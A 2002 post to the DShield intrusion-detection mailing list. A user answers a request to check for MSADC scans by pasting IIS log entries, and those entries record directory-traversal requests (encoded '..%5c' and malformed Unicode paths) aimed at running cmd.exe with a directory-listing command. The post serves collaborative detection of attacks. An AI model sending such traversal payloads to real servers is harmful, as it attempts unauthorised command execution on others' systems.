[Dshield] RE: scans for MSADC bug?

Sue Young smy at gcmlp.com
Mon Nov 25 16:42:17 GMT 2002


You mean this?

2002-11-25 09:48:56 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:48:57 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:48:57 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:01 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:01 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:01 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:02 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:02 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:04 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:07 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 -
2002-11-25 09:49:07 80.128.177.24 - xxx.xxx.xxx.xxx HEAD
/msadc/..%5c../..%5c../..%c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir+c:\ 500 -
2002-11-25 09:49:07 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/..À/..À/winnt/system32/cmd.exe /c+dir+c:\ 404 -
2002-11-25 09:49:09 80.128.177.24 - xxx.xxx.xxx.xxx 80 HEAD
/msadc/winnt/system32/cmd.exe /c+dir+c:\ 404 -

-----Original Message-----
From: Johannes Ullrich [mailto:jullrich at euclidian.com] 
Sent: Thursday, November 21, 2002 7:49 PM
To: intrusions at incidents.org; list at dshield.org
Subject: scans for MSADC bug?



we got some anecdotal evidence (IM's from a couple people) that look like
there are scans for the latest MSFT 'msadc' bug. Can everyone take a good
look at their web logs and see if they find anything suspicious?

(and if you haven't patched your IIS servers, see if you have any odd
outbound traffic going on).


-- 
--------------------------------------------------------------------
jullrich at euclidian.com             Collaborative Intrusion Detection
                                         join http://www.dshield.org




More information about the list mailing list